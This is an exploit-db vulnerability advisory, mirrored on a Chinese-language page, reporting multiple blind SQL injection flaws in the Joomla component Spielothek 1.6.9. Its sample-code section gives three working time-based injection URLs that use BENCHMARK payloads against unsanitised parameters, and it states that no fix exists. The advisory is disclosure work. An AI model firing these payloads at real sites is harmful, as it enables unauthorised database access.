Joomla! Component com_spielothek 1.6.9 – Multiple Blind SQL Injections

  • 作者: Salvatore Fresta
    日期: 2010-07-31
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14518/
  • Spielothek 1.6.9 Joomla Component Multiple Blind SQL Injection
    
     NameSpielothek
     Vendorhttp://www.spielban.de
     Versions Affected 1.6.9
    
     AuthorSalvatore Fresta aka Drosophila
     Website http://www.salvatorefresta.net
     Contact salvatorefresta [at] gmail [dot] com
     Date2010-07-31
    
    X. INDEX
    
     I.ABOUT THE APPLICATION
     II. DESCRIPTION
     III.ANALYSIS
     IV. SAMPLE CODE
     V.FIX
     
    
    I. ABOUT THE APPLICATION
    ________________________
    
    Thiscomponentallowsyoutopresentyourusers a
    highscore-enabled game-area.It is based on the all known
    joomlaflashgames, but with more features and with better
    scoring method. Youcan create own categories for games
    andletyoursite-visitorshave fun,sotheywill
    return.
    
    
    II. DESCRIPTION
    _______________
    
    Some parametersare not properly sanitised before being
    used in SQL queries.
    
    
    III. ANALYSIS
    _____________
    
    Summary:
    
     A) Multiple Blind SQL Injection
     
    
    A) Multiple Blind SQL Injection
    _______________________________
    
    Manyparametersinvariousfiles such as battle.php,
    scores.phpetc. are not properly sanitised before being
    used in SQL queries.Becauseof the number of flaws, I
    can't report the entire vulnerable code;butI can say
    thatmostof the numeric fields have not been properly
    checked.
    
    
    IV. SAMPLE CODE
    _______________
    
    A) Multiple Blind SQL Injection
    
    http://site/path/index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
    
    http://site/path/index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
    
    http://site/path/index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
    
    
    V. FIX
    ______
    
    No fix.